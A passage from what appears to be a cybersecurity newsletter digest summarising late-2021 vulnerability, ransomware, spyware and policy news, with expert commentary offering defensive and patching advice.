  • The importance of this vulnerability cannot be overstated. Past log4j vulnerability have been actively exploited for years, and vendors like Oracle continue to patch these past vulnerabilities in their products. Luckily there is a configuration workaround that you may consider to mitigate this vulnerability. Do so now as the exploit is trivial and has been made public.
  • This is a case for continuous in-house pentesting for organizations large enough to support it. Apache Log4j is one of those web application plumbing components that many companies won’t know they’re using – much like Apache Struts 2. In fact, if you’re running Struts 2, you’re likely running a vulnerable version of Log4j. Further, much like Struts vulnerabilities, it’s the kind of flaw that generally needs to be checked actively and won’t come up in typical vulnerability scans.

Read more in

Cyber Incident Reporting Requirements Removed from FY 2022 NDAA

The most recent version of the fiscal year 2022 US National Defense Authorization Act (NDAA) no longer includes language that would have imposed mandatory cyber incident reporting. Earlier versions on the NDAA included a provision that would have directed the Cybersecurity and Infrastructure Security Agency (CISA) to establish an incident reporting process for critical infrastructure operators.

Note

  • Beyond mandatory reporting voluntary reporting is still an option and will help the CISA tune their response efforts. Regardless of reporting, working with the CISA and your sector ISAC will give you access to peers, best practices, assessments and incident response help and expertise.

Read more in

NIST to Solicit Input on Supply Chain Security Guidance

In early 2022, the US National Institute of Standards and technology (NIST) will seek input to update its Cybersecurity Framework to include guidance for supply chain security issues. The request for information (RFI) will also likely seek ways to make the Cybersecurity Framework more consistent with other NIST cybersecurity guidance documents.

Note

  • NIST is expected to issue guidance on software security best practices in early February, 270 days after EO 14028 was issued, seize the opportunity to provide real-world input into this guidance. NIST will also be operating pilot programs, based on this guidance, which report out in May.
  • Three paragraphs in, this article has a line that starts with “While the agency has been studying the topic (for) years, …” and I stopped reading there.
  • The reports seem to suggest that NIST is focused on “advice to small business,” the segment least well equipped to do anything to address malicious code shipped to them by suppliers. We must hold suppliers accountable for malicious code that they ship.

Read more in

Eltima SDK Vulnerability Affects Cloud Services

Researchers from SentinelOne have detected a privilege elevation vulnerability in Eltima’s software development kit (SDK) for virtual networking. The library is used by multiple cloud services for USB over Ethernet capability. Vendors have made updates available.

Note

  • This vulnerability affects products like Amazon Workspaces that offer “Desktops in the Cloud.” To connect USB devices like cameras to these cloud systems, the Eltima SDK provides USB access over IP networks. The advisory lists some of the vulnerable products, but there are likely more.
  • Amazon released updates in July, while other cloud providers released updates in September and October. Make sure your cloud provider has implemented the updated USB over Ethernet drivers, if they are using Eltima’s packages. The update requires client and service changes, read your cloud service provider’s guidance. AWS AutoStop WorkSpaces with maintenance turned on, or AlwaysOn WorkSpaces with OS updates turned on will be updated, otherwise manual steps are needed. Scan to make sure the desktop clients are running the latest versions.

Read more in

SonicWall VPN Appliance Vulnerabilities

SonicWall is urging customers to patch SMA 100 series appliances to address at least eight security issues. Among the most serious vulnerabilities is an unauthenticated stack-based buffer overflow flaw that could be exploited to take control of vulnerable devices.

Note

  • There are no mitigations to this one, you need to update the firmware. Note this is the SMA 100 series – which includes the SMA 200, 201, 400, 410 and 500v appliances. As these appliances are providing firewall and remote access (boundary protection) services, prioritize updating them, particularly as remote access vulnerabilities have been a focus for threat actors.

Read more in

Cisco Warns of Apache HTTPS Server Vulnerabilities That Affect Cisco Products

Cisco has updated a November 24 advisory about vulnerabilities in Apache HTTPS Server to include additional information about products under investigation, vulnerable products, and products confirmed not vulnerable. The flaws were initially disclosed in September.

Note

  • Exploits include an unauthenticated remote attacker being able to leverage mod_proxy to forward requests to an arbitrary server. The Cisco advisory lists the vulnerable products, some of which do not yet have fixes. Read the product specific bug advisory for mitigations or workarounds.

Read more in

MikroTik Routers Vulnerable to Attacks

According to researchers from Eclypsium, up to 300,000 MikroTik routers are vulnerable to exploits that could harness their resources to be used in a botnet. The flaws have been known for more than a year.

Note

  • MikroTik routers are very capable and powerful devices, but they lack the management features enterprise equipment has, which makes it difficult to maintain them. Targeting more “Prosumers” and “Enthusiasts”, these devices are more capable than the average home/SMB router, but they do show the same weaknesses as the smaller devices. This makes them an interesting target for attackers looking for platforms to build botnets or mine cryptocoins.
  • Make sure that you’re changing default credentials, enabled auto-update of firmware, and disabled remote access to the management interface. Also make sure that you’re checking them for vulnerabilities or threats. The Eclypsium report includes links for a free tool which can check this for you.

Read more in

“Prolific” Canadian Cybercriminal Charged

Canadian and US officials have jointly charged Matthew Philbert with fraud and conspiracy in connection with multiple ransomware attacks. Philbert has been described as “the most prolific cybercriminal … identified in Canada.” The attacks targeted individuals, private companies, and government organizations in the US and Canada.

Note

  • Many of these attacks were targeted at small businesses less likely to have a robust security program and leveraged email with malicious attachments. Use caution with attachments, particularly from unknown sources, has to be more than a slogan on a sign or implemented in training, make sure your users internalize it. Most cloud based email services offer security services to screen and/or block malicious attachments and senders, make sure that you’re enabling these services to help reduce the likelihood of a user choosing badly. The cost difference of these services, if any, is far less than recovery from Ransomware or other incident.

Read more in

5 Things You Must Know About Log4Shell

This is the largest vulnerability we have seen in years. Here are 5 key things to note about this vulnerability:

  1. You may still be vulnerable even if your project is not based on Java. Many tech stacks are vulnerable because so many tools use the Log4j including infrastructure, dev-tools, and CI/CD products.
  2. Log4Shell will be here for a while. Log4j is a basic core component that is already in use in many products, including network devices, management consoles, and enterprise software and hardware. They just cannot be upgraded in a few days.
  3. Companies may still be vulnerable even if the vulnerable host is deep inside its network perimeter. The root cause of this issue is a simple string that could be logged by a vulnerable server through many hops — and trigger the remote code execution
  4. There will be breaches. So, yes your personal private data is at risk as well. On Github, someone has already posted screenshots of successful exploitation resources of large enterprises including Apple, Tesla, and Microsoft services.
  5. WAFs can’t protect in full. The exploit can come through any protocol, including APIs like gRPC and GraphQL, or for example DNS or UDP. WAFs are not really helpful here.

NSO’s Pegasus Spyware Found on iPhones of US State Department Employees

According to a report from Reuters, phones belonging to at least nine US State Department employees were infected with Pegasus spyware. The malware is made by NSO Group. The targeted employees were either based in Uganda or were working on Uganda-related issues. Pegasus capabilities include location tracking, microphone activation, and data theft. A State Department spokesperson declined to confirm the report.

Note

  • There are so many takeaways from this story. First, while NSO claims it will take legal action against those who misused its tools, their customers will likely have more success in claiming sovereign immunity than NSO itself. Second, it’s unfortunate that Apple doesn’t provide users with more information they can use to detect an attack themselves. Companies like NSO will continue to capitalize on this lack of transparency to victimize users. Finally, it’s hard to imagine these actions (and others like them) aren’t related to the sanctions placed on NSO.
  • The story of NSO should also be seen as a warning to other companies offering offensive tools commercially. Well-funded attackers often use the same tools red teams use legitimately in authorized penetration tests. So far, I don’t think anybody has found a way to effectively restrict how these tools are being used. NSO group stuck out for its unique abilities to attack mobile devices, and in some ways, its downfall was that the tool was “too good.”
  • Apple is taking the initiative to notify users who have devices infected with the NSO spyware. The vulnerability used to install their software was closed in the September release of iOS 14.8. Make sure that your devices are on current versions, particularly if deployed in foreign countries. Make sure that your mobile device management system can actively detect spyware installed on your devices rather than having a third-party give you the bad news. Note that while NSO claims to only license their software to government agencies with strict terms including Israeli government granted export licenses, and use against USG employees is strictly prohibited, that is an administrative rather than a technical control; you need to implement the technical controls to insure the attack vectors remain closed.
  • The US federal government has long neglected an opportunity to use its buying power to drive Google and Apple to support a trusted “Government App Store” as part of all federal wireless contracts. Google and Amazon provided federal cloud capabilities because the federal government did use their buying power as FedRAMP and US government “Cloud-first” initiatives were backed with procurement requirements.
  • Working for a company that sells an adversary emulation platform, we have to maintain a balance between operational security and feature sets. Products that do not “call home” are welcomed by our customers but if the product lands in the wrong hands, we would have no visibility into its use. This is what has occurred with Pegasus and other products. Learning from these mistakes is costly but required.

Read more in

FBI Warning on Critical Infrastructure Ransomware Attacks

The FBI has released a TLP:White Flash warning that the Cuba ransomware has been used in attacks targeting entities in multiple critical infrastructure sectors, including financial, healthcare, and IT. The Flash lists technical details about Cuba ransomware, as well as indicators of compromise and recommended mitigations.

Note

  • While I will always applaud the release of IOCs to aid with detection, the way this report was released leaves a bit to be desired. Critical infrastructure consists of 16 different sectors covering broad swaths of industry, including information technology. In the future it would be ideal if the broad cover of “critical infrastructure” isn’t used without further clarification.
  • Add the IOCs from the Flash to your SIEM and keep an eye out for new ones; the FBI is asking for new discoveries to be shared with them. Make sure you’re segmenting critical systems, only allowing communication between trusted components. Use strong/unique passwords or better still, require MFA for any services which can interact with these systems, which themselves may not be able to support MFA. Actively monitor activity to detect anomalous behavior.
  • Does your organization have a process to consume this cyber threat intelligence and ensure the team can detect and respond to these adversary behaviors? If not, performing adversary emulations as purple team exercises is one of the most efficient methods to test, measure, and improve your people, process, and technology so these known attacks do not impact your organization.

Read more in

Microsoft Dismantles APT Group’s Infrastructure

Microsoft’s Digital Crimes Unit has taken steps to disrupt operations of an advanced persistent threat (APT) group with ties to China. Recently unsealed court documents show that Microsoft was granted the authority to seize websites in 29 countries that were used by the hacking group, which it has nicknamed Nickel.

Note

  • This operation is significant in scope and impact. In particular the takeover of command and control domains from the threat actor will allow Microsoft to continue to identify victims. The report also demonstrates how even apex-grade threat actors use commodity tools, such as mimikatz and NTDSDump. They can do that only because these tools continue to work in victim environments.
  • It is hard to complain about Microsoft shutting down malicious websites, but the bulk of the attacks launched by Nickel and others were exploiting the continuing stream of critical vulnerabilities in Microsoft’s software. It is kind of like if Tesla formed a Digital Crimes Unit to shut down thieves that were stealing Telsa cars because the Tesla door locks didn’t work.
  • It is excellent that Microsoft is taking steps against those working to exploit the vulnerabilities in their systems. One hopes they are spending as much or more energy on fixing those weaknesses. For the rest of us, keep an eye on updates to both our endpoint operating systems and protection products. Make sure they are reporting in regularly and that your responders have what they need – resources and training – to respond to detected maleficence.

Read more in

Gen. Nakasone: US Military Has Taken Action Against Ransomware Actors

The US military has taken action against ransomware actors, according to head of Cyber Command General Paul Nakasone. Prior to the Colonial Pipeline and JBS attacks, the government saw ransomware attacks as the purview of law enforcement. Nakasone said that Cyber Command would take action against any cyberthreat actors that target US infrastructure, whether or not they have geopolitical ties. Nakasone also heads the National Security Agency (NSA).

Note

  • What makes this announcement new is the US military is now stating it will not only respond to and target nation state actors but also cyber criminal actors. A big part of this is because the impact of both nation state and cyber criminals are starting to blend. Both can have a direct impact to the country’s ability to operate at a political, economic or military level as both can and do have an impact on critical infrastructure. I believe this is a step in the right direction. Until cyber criminals face consequences for their actions, they have no motivation to stop attacking; cyber crime is simply far too profitable and effective. Law enforcement is one approach, but difficult when the cyber criminal actors are protected by their host country. Other methods like these may be required.
  • The US has a long history of separating military and law enforcement actions. Ransomware seems to be a rare case where national security interests justify a military response. However, we must be careful as a nation not to normalize military operations in criminal actions, either for investigation or response. It’s not hard to see the slippery slope here – especially because CYBERCOM has had real successes where law enforcement authorities were simply not sufficiently matched to the ransomware threat.
  • Response to cyber criminals, such as ransomware actors, will need multiple agencies across multiple countries. Bringing available resources and expertise together will help with takedowns of these groups; the NSA and Cyber Command have already started cooperating with other agencies to increase the effectiveness of these activities.
  • The story below on GAO asking government to act along with this story confirming the military is acting is what we will continue to see in the short term. Organizations have proven they cannot defend themselves against ransomware. We will follow and report the evolution of the fight against ransomware and hope it leads to its demise.

Read more in

GAO: Government Must Take Steps to Protect Critical Infrastructure

In testimony before the US House Committee on Transportation and Infrastructure, the Government Accountability Office (GAO) warned that the government must take action to protect the country’s critical infrastructure from cyberattacks.

Note

  • Now is the time to get acquainted, or reacquainted, with your local CISA contacts. They will be driving at the direction of DHS, any actions (technical or reporting) needed. Expect pressure to follow and report the use of NIST frameworks and standards as well as reporting security metrics via the Continuous Diagnostics and Mitigation (CDM) program. If you’re following other security frameworks, the NIST CSF documentation includes tools for mapping other security frameworks to NIST controls such as SP 800-53, which you can leverage.
  • From the perspective of my small town’s water district, this message may be well-received, but without additional resources, little will change. Personal agenda: I’d love to see National Guard units gain authority to assist such organizations during regular training assemblies under supervision of CISA. They have the skills, the community ties, and 39 days per year to train.
  • While the “Government” in this particular piece refers to the US government, I think it is safe to say the same commentary can be aimed at nearly every other government across the globe. For too long, governments have under-invested and under-resourced cyber security, relying on the private sector to fill the gap. Unfortunately, that gap still remains unfilled.

Read more in

HHS Launches Healthcare Sector Cybersecurity Website

The US Department of Health and Human Services (HHS) has launched a website for its 405(d) Aligning Health Care Industry Security Approaches Program. The site offers cybersecurity resources for the healthcare sector, including recommended products, tools, and mitigations.

Note

  • The HHS 405 (d) Program, established in response to the Cybersecurity Act of 2015, is looking for participation to make this site relevant and useful. The intent is to provide vetted practices, which means they are looking for input from those in the field with relevant experience about what does and does not work.
  • Cybersecurity professionals working in security should provide feedback to HHS on how to make this site useful to their efforts. My first impression is it is heavy on pointing to products and light on people/processes/skills. What I’d really like to see is more case studies: “Here’s how a healthcare company like you overcame the unique obstacles to securing systems faced in healthcare.”

Read more in

Spar Supermarkets Hit with Cyberattack

Hundreds of Spar supermarkets in the UK have been temporarily closed due to a cyberattack that affected the store’s payment processing capabilities. Some stores affected by the attack switched to cash only transactions. The National Cyber Security Centre is aware of the issue.

Note

  • This appears to be a supply chain type of attack. According to the BBC (www.bbc.com: Spar cyber attack hits more than 300 convenience stores) the external IT provider who manages the IT and till/register systems for the affected Spar shops is the victim of the ransomware attack. This attack again highlights the importance of managing third-party risk and assessing how a ransomware attack against one of your suppliers, in particular those deeply embedded in your IT infrastructure, would impact your business and to then put in appropriate controls to manage that risk.
  • In retail, the holiday season often comes with a change freeze for IT, and with that the inability to apply patches. At the same time, ransomware actors in particular realize that retail stores are dependent on holiday sales. While Spar is more a generic grocery store chain, they will likely still see increased traffic in their stores during holidays.
  • I worked my way through college in retail where we had no electronic POS system, to include the old knuckle-buster credit card machines and know what it’s like to chase down errors in making change. After 20 months of electronic payments versus handling cash, you may need to provide a refresher to those handling cash to avoid errors, particularly if the POS system is offline. Make sure your backup/manual procedures are still accurate.

Read more in

Cyberattack Hits Colorado Utility

The Delta-Montrose (Colorado) Electric Association (DMEA) experienced a cyberattack in November that disrupted billing systems and destroyed 20 years of records. DMEA expects to have its billing systems up and running sometime this week.

Note

  • Double check that your backups are disconnected, differential and resistant to ransomware attacks. Don’t forget to look at your records retention practices. As many records have been digitized, moved on-line and the paper shredded, those too need to have secure backups for the retention period.

Read more in

Cyberattack Hits Colorado Utility

The Delta-Montrose (Colorado) Electric Association (DMEA) experienced a cyberattack in November that disrupted billing systems and destroyed 20 years of records. DMEA expects to have its billing systems up and running sometime this week.

Read more in

HP Releases Firmware Updates for Printers

HP Enterprises has released firmware updates for more than 150 models of its multifunction printers. HP learned of the vulnerabilities from F-Secure in April 2021. One of the issues addressed in the updates is a critical buffer overflow vulnerability; the other is a high-severity information disclosure vulnerability. The flaws could be exploited to take control of vulnerable devices, steal information, and gain access to networks.

Note

  • This vulnerability affects printers for the last few years. If you have an HP printer, it is likely vulnerable. Update your firmware in particular if the printer is reachable over a network. The other exploit scenarios may be less of a problem if the printer is located in a home office without easy access.
  • Coincidentally, the SANS Holiday Hack Challenge will feature a printer hack this year. As an overlooked part of most infrastructure networks, printers make interesting targets for adversaries since they are seldom subject to rigorous patch management processes. We thought it important to highlight printer vulnerabilities as a common threat for many organizations.
  • By now, network-attached printers should be fully covered by vulnerability management processes, across their entire lifecycle, including disposal. If not, there have been real world damage-causing exploits against printers over the past 5 years – seeing vulnerabilities that include code execution should be a red flag for action.
  • Make sure you’re installing firmware updates on your printers. If you’re using a third party double check their practices. Understand controls which allow or disallow Internet printing before enabling that capability. As many printers now cache information and have ports for USB or other memory cards, consider locations away from unescorted access, not just to prevent media insertion, but also limit unintended browsing of sensitive output. Consider using devices that permit jobs to be queued/paused until the requester is physically present.

Read more in

AT&T Networking Devices Infected with Botnet Malware

AT&T is dismantling a botnet that had established itself within the company’s network. The malware affected EdgeMarc Enterprise Session Border Controller appliances.

Note

  • Last week, we had a story about Sky waiting a year to patch customer premise equipment. AT&T didn’t want to be outdone and is now, four years after the vulnerability was originally reported, and after it is actively being exploited, considering steps to mitigate it. In your office (and home office) network design: Treat ISP supplied equipment as hostile and outside your perimeter.
  • The report suggests that ATT’s use of wildcard certificates may have enabled the malware to get broad internal access. NSA put out a warning about wildcard certs in October 2021. (Just search for “NSA ALPACA” because the creative folks at Ft. Meade used that very cool acronym for “Application Layer Protocols Allowing Cross-Protocol Attacks” vs. earlier use of it for Application Layer Protocol Confusion attacks.)
  • In addition to wildcard certificates, it appears these devices also have default credentials which need addressing A patch was released in December 2018, about 19 months after the first discovery of the flaw. Application of the patch has manual updates.

Read more in

NSS Crypto Library Flaw

Mozilla has released fixes to address a critical flaw in the Network Security Services (NSS) cryptographic library. The heap overflow vulnerability affects all versions of NSS older than 3.73 and 3.68.1 ESR.; it was detected by Google Project Zero’s Tavis Ormandy.

Note

  • The NSS library isn’t as well-known as openssl, but the scope of its use is similar. Many clients, and in a few cases servers, use this library. As so often with these library flaws, patching the library is just a first step. You may also need to patch software using it.
  • Tavis’ write-up of this flaw indicates that redirecting code execution is trivially exploitable. NSS is used by Firefox, Thunderbird, and a variety of other software projects from RedHat, Oracle, SUSE, and others: developer.mozilla.org: Overview of NSS Open Source Crypto Libraries
  • This applies to products which use the NSS for handling signatures such as Thunderbird, LibreOffice, Evolution and Evince. The fixes to Thunderbird were released 30 days ago, so the fixed libraries are now available for public download. This also means the most current releases of these products include the fixes, make sure they’ve been updated in your environment.

Read more in

Panasonic Discloses Network Breach

Panasonic has disclosed that its network was breached earlier this year. The attackers had access to the network from June through November 2021. Panasonic noted that the intruders had accessed some data on a file server.

Note

  • There are two issues here – closing the access path and determining the level of access or damage. Could you detect accesses to your file servers or other resources that happened six months ago or are you rolling the logs over when they get “too big” irrespective of duration? While Panasonic says nothing about the exact access method, you may want to make sure that you’re actively disabling inactive accounts, only granting users the access they need for their role with a regular review to ensure they are not over permissioned.
  • Attacker ‘breakout time’ is a metric we use to measure the amount of time it takes an attacker to go from initial exploitation to secondary post-exploitation or lateral movement within a network. For sophisticated attackers, breakout time is measured in minutes, or hours. Panasonic’s case is not unusual, where it may take an organization several months to identify a compromise. Threat hunting and red team exercises can help shorten that detection window, but must be supported by a strong incident response process.

Read more in

Former Ubiquiti Employee Arrested for Data Theft and Extortion

Law enforcement officials have arrested a former Ubiquiti employee for stealing data and then attempting to extort nearly $2 million from the company. Nickolas Sharp also allegedly posed as a whistleblower, planting false news stories about the breach.

Note

  • I have seen some talk about how to detect the kind of activity this developer used to collect the information. Many suggestions do not take into account the access developers need to work effectively. A developer typically needs read access to repositories other than the one they are working on even for little things like a quick copy/paste. Do not use this incident to make your developers’ lives any more difficult.
  • This is a case of a trusted insider, with administrator access, abusing those privileges, including modifying logs to cover his tracks. Further, he leveraged an incident to mask his activities. This is an excellent scenario for a tabletop exercise to talk about prevention and discovery. Consider actions such as forwarding logs to a centralized service to reduce the likelihood of modification; performing traffic flow analysis coupled with other DLP tools to discover data exfiltration. Make sure that you’re collecting information from insource, outsourced and cloud systems wherever possible.

Read more in

Bulletproof Hosting Provider Sentenced to Prison

A US federal judge in Michigan has sentenced Aleksandr Grichishkin to five years in prison sentence for providing bulletproof hosting services that were used to operate botnets, spread malware, and steal sensitive financial information. The service hosted Zeus, SpyEye, Citadel, and Black Hole malware.

Note

  • There’s a long history in the US of the RICO (Racketeer Influenced Corrupt Organization) act to go after those who knowingly profit by selling products and services to bad guys who meet the broad definition of RICO. While it is so broad that there have been abuses, it is good to see convictions (and asset seizures) coming against the modern equivalent where services providers are profiting from criminals. Good to use this to notify the product/service side of your company of the need to “know your customer.”

Read more in

TSA Cybersecurity Directives for Passenger and Freight Rail

The US Transportation Security Administration (TSA) has published cybersecurity directives for freight and passenger rail. The directives require that cyber incidents are reported to the government within 24 hours after they are detected. They also require cybersecurity assessments and incident response plans based on the results of the assessments.

Note

  • The first directive is to designate a cybersecurity coordinator to perform the identified tasks. The question is – do you have someone in a similar role? This is a liaison between you and your regulator, relevant ISAC or even CISA. This would also be a good person to coordinate vulnerability disclosure activities.

Read more in

BadgerDAO and MonoX Disclose Cryptocurrency Thefts

$120 million in cryptocurrency was reportedly stolen from the BadgerDAO blockchain decentralized finance platform wallets earlier this week. Badger believes the theft involved a malicious script in their website’s user interface. Badger froze smart contracts after learning of the thefts. In a separate story, MonoX Finance reported that an attacker exploited a bug in smart contract drafting software to steal $31 million in cryptocurrency.

Note

  • Access leveraged an API key which was allegedly protected by 2FA. When you implement 2FA, you need to implement it properly. This is another case where you don’t want to “roll your own,” use an existing tested solution, then test your implementation rigorously.
  • Insert usual comments here about why the term “cryptocurrency” is an oxymoron. Another note: calling the “MonoX Finance” software is like calling your kid’s fingerpainting “art.” The token abuse exploited is pretty much the equivalent of the web price changing vulnerabilities that worked in the first online commerce sites decades ago.

Read more in

Airgap Attack Frameworks

Researchers from ESET have published a report examining all known frameworks that have been used to attack air-gapped networks. ESET notes that all the frameworks were designed for purposes of espionage and all used USB drives as the primary vector of transmission. Additionally, all known frameworks were designed to attack Windows systems.

Note

  • If you’re relying on air-gapped networks for security, review the white paper to understand what processes can be leveraged to cross that gap and how to secure them. Look first at how you’re transferring information in and out of those systems, making sure only trusted files and media are allowed, that you’re scanning that media aggressively.
  • Systems that are not connected to the public networks for security reasons are probably sufficiently sensitive that they must be protected physically.

Read more in

Windows Installer Flaw is Being Actively Exploited

Attackers are actively exploiting an inadequately patched flaw in Microsoft Windows Installer to gain admin rights on vulnerable systems. Microsoft released a fix for the medium-severity privilege elevation flaw in November’s Patch Tuesday release, but the researcher who initially detected the flaw has detected a more serious variant. The vulnerability affects all versions of Windows.

Note:

  • Not much you can do about this right now. But remember, that this is “just” a privilege escalation flaw. Sadly, privilege escalation flaws are common enough to always assume that there are a few being exploited for which no patch is available.
  • This is a great example of where vulnerability management and purple teams will provide value added to the organization. The VM team should be on top of situations like this where a patch doesn’t completely remediate the vulnerability. The purple team should be ready to assist in crafting detections that align with the organization’s telemetry. For those with neither team, know that this is a Local Privilege Escalation (LPE) vulnerability and can only be triggered by a threat actor who already has gained execution on the system. It also poses increased risks for insider threats who might seek to elevate their privileges.
  • The flaw allows for privilege escalation using an existing account. While the long-term fix is another update from Microsoft, in the short term you can leverage the Snort rule SSID’s 5865 and 58636 to block exploitation. Note these are in the Snort Subscriber Ruleset, not the free Community Ruleset.
  • Pen testers: it’s good to exploit these types of flaws, but do consider what your recommendation is beyond, “Implement patch when available.” What detections can you recommend? What possible follow-on actions might defenders look for? Are there other compensating controls (specific to their environment) that can lessen the frequency or severity of privilege escalation vulnerabilities like this one?

Read more in

Health-ISAC Guidance on Identity-Centric Approach to Cybersecurity

New guidance from the Health Information Sharing and Analysis Center (Health-ISAC) provides an identity-centric approach to cybersecurity to help health care organizations comply with 21st Century Cures Act requirements without introducing vulnerabilities. The 21st Century Cures Act requires healthcare organizations to create new APIs that operate on the Fast Healthcare Interoperability and Resources (FHIR) standard and that enable interoperability of electronic health data. Recent research has shown that there are security concerns posed by the FHIR API ecosystem.

Note

  • Exposing these systems directly to patients requires strong identity management practices, as outlined in the guidance. While MFA is optional, there are risks to not implementing it: think HIPAA violations and associated penalties. Prepare to federate authentication by leveraging OAuth and OpenID Connect, monitor your API use, respond to anomalous activity.
  • Back in the early 2000’s, the firewall was a mark of the rise of infosec. Firewalls separated friends from enemies – and weak defenders from strong. Now that “identity is the new perimeter,” secure, easy-to-use identity solutions are becoming a new mark. As traditional username:password continues to disappoint, what technology will fit your organization well?
  • In an attempt to avoid being overly prescriptive, HIPAA required covered entities to do risk assessments that they were poorly equipped to do. One effect was to retard the adoption of electronic health records by a generation.

Read more in

Proposed UK Legislation Aims to Improve IoT Device Security

Proposed legislation in the UK would establish mandatory security standards for Internet of Things (IoT) devices. The Product Security and Telecommunications Infrastructure Bill would apply to IoT manufacturers, importers, and distributors. The bill would let “the government … ban universal default passwords, force firms to be transparent to customers about what they are doing to fix security flaws in connectable products, and create a better public reporting system for vulnerabilities found in those products.”

Note

  • It’s easy to joke about the limited impact of eliminating universal default passwords, but the impact is substantial. Just last week NewsBites reported on a DNS rebinding vulnerability in Sky routers that allowed full device takeover. But this was only possible because of universal default passwords. I’m also excited about the prospect of increasing transparency, but that’s much harder to measure and only time will tell how this is implemented.
  • A number of governments have put forward initiatives to make it easier for consumers to recognize secure devices. This is the first one I am aware of that spells out mandatory requirements to be allowed to sell devices. I like the idea to put the responsibility at the manufacturer instead of the consumer. It is no longer the consumer failing to change default passwords, but it calls manufacturers out for delivering devices with common default passwords. My wishlist for IoT security also includes well-defined “end of support” dates.
  • While the legislation is likely to be modified before final passage, imposing fines for non-compliance to security standards should help motivate vendors to meet the required minimums. What is needed is equivalent standards in multiple countries to raise the bar across the board.
  • This is a small but important step forward. These few requirements will not make IoT fully secure but they establish an important floor, kind of like restaurants being required to at least have working refrigerators and rodent control systems or they can be shut down. Doesn’t mean the food can’t still be poisonous but people are still safer for it.

Read more in

Problematic Patch Impacts Microsoft Defender for Endpoint

A buggy patch has caused problems for Microsoft Defender for Endpoint on some Windows Server devices. Users running Windows Server 2019 devices with update KB5007206 or later and Windows Server 2022 devices with update KB5007205 or later installed have reported that Microsoft Defender for Endpoint will not launch.

Note

  • Good News/Bad News: The Good News is this doesn’t impact desktop or other non-server Windows distributions; the Bad News is the problematic patch only affects Windows Server systems running the Windows Defender service. If you’re using a different endpoint protection service, you’re not impacted. Note that if you are using Windows Server versions for desktop virtualization, such as AWS Workspaces, you should make sure you’ve got another endpoint protection service running.

Read more in

UK Ministry of Justice Disables Poorly Protected ICS Wi-Fi Access Points

The UK’s Ministry of Justice has disabled several Wi-Fi access points that were inadequately secured. The access points could have been used to gain access to industrial control systems (ICS) that manage boiler pumps in the Royal Courts of Justice. The access points did not require passwords and led to an ICS login page. The Ministry of Justice was alerted to the problem by British tech news website The Register.

Note

  • I want to be surprised, but I can’t be. This sounds like it is really part of a building management network, a specific type of ICS. Unfortunately, in most cases building management networks are installed and configured by vendors and maintained by staff that are more comfortable with a wrench than a command prompt. It is not at all uncommon to discover building management networks very poorly secured. Work with your organization to determine how your connected building management systems fall under the purview of the cybersecurity team. If not, make a strong case to secure them. When the proverbial poop hits the fan (or a threat actor just turns the fans off), it *will* be considered a cybersecurity problem.
  • These interfaces were intended to allow for remote management and optimization of the system. While wireless control is often a provided component, it must be secured during deployment. The added problem is many ICS/IoT systems have default credentials, which are published in documentation which is generally accessible online. In short make sure that your wireless interfaces are securely configured, and that you change default credentials. Verify these credentials and configuration remain set after a reboot or power cycle.

Read more in

Vestas Says Cyberattack Was Ransomware

Danish wind turbine manufacturer Vestas has confirmed that a November 19 cyberattack was in fact ransomware. The company says that most of its IT systems are now operational.

Note

  • Vestas is still recovering from the incident, so don’t expect a full recounting until that completes and the incident investigation completes. Research by Coveware shows the average downtime from Ransomware to be 16.2 days and average payment is $140,000 in Bitcoin.

Read more in

DBS Bank Suffers Intermittent Outages

Singapore’s DBS Bank experienced outages last week that prevented customers from accessing their online accounts. The Monetary Authority of Singapore “expects DBS to conduct a thorough investigation to identify the root causes and implement the necessary remedial measures,” and will determine what “supervisory actions” to take after that assessment is complete.

Note

  • Online services have gotten more complex. That increases the difficulty of protecting them, but also the difficulty of assuring required service level agreements can be meant at all reliably. If one service relies on 5 suppliers with .99 SLAs, you can still on average meet a .95 SLA requirement. But, if any supplier is at or below .95, you can’t. Protecting against cyberattacks means keeping availability above the required level – if all margin has been consumed by unreliable service, even a minor incident can result in major financial damage.
  • This comment is for the DBS story and the Vestas story above. Traditionally cybersecurity has focused on confidentiality and integrity of data, as that is where the value is for both cyber criminals and nation state actors. But within the past 18 months it seems we have seen a dramatic rise in availability issues also. By availability I mean the operational capability for an organization to fulfill its mission. In most cases the shutting down of operations is not the end goal of the threat actor, but either merely a means to an end (extortion) or accidental collateral damage (NotPetya like incidents). Most likely these availability impacts will only increase as our world becomes more interconnected and interdependent on each other. Finally, unlike confidentiality and integrity incidents, availability based incidents can have an immediate and physical impact to people at a large scale.

Read more in

Maritime Services Company Suffers Cyberattack

Singapore-based maritime services firm Swire Pacific Offshore has disclosed that it was the victim of a cyberattack. The incident “resulted in the loss of some confidential proprietary commercial information and … some personal data.”

Note

  • It is interesting to note that Singapore data protection laws require data breaches to be reported to the government; failure to report can result in a fine of about $7,300 or a two-year jail sentence. The full details of this incident may only be revealed in that reporting process.

Read more in

CISA Publishes Mobile Device Cybersecurity Checklist for Organizations

The US Cybersecurity and Infrastructure Security Agency (VCISA) has released a mobile device security checklist for organizations. CISA’s recommendations include enabling automatic updates through a Mobile Device Management system; establishing a trusted devices policy; and enabling two-factor authentication. CISA also urges organizations not to allow mobile devices to connect to critical systems.

Note

  • This checklist is device agnostic. Consider the points in the checklist making sure you can detect compliance and non-compliance with your chosen options. For example how granular is your OS version/update detection and will that match your patch/update requirement enforcement? Consider what sorts of data persist on your mobile devices and what applications you allow them to access, and how you can isolate enterprise applications and data on the devices. I created a similar checklist in which used to be included in the SANS SEC 575 course, the trick is maintaining it to keep it relevant.
  • Recommendations should distinguish between enterprises managed and user-managed devices.

Read more in

GAO: CISA Needs to Assess Effectiveness of Communications Sector Programs

According to an audit report from the US Government Accountability Office (GAO), the Cybersecurity and Infrastructure Security Agency (CISA) “has not assessed the effectiveness of its programs and services to support [the communications] sector.” GAO has made three recommendations: Develop metrics and analyze feedback from sector infrastructure owners and operators to determine the programs’ effectiveness; Assess capability for Emergency Support Function #2; and Revise sector specific plan “to include goals, objectives, and priorities that address new and emerging threats and risks to the Communications Sector and that are in alignment with sector risk management agency responsibilities.”

Note

  • Where are you getting guidance and support for cyber security? Are you following up-to-date guides or are you still looking back to information published “a while ago?” Look for updated versions of your current guidance. If they don’t exist, then look to alternate references for alternatives. Make sure that your self-assessments include effectiveness reviews of your cyber security protections, to include your MSP if used.

Read more in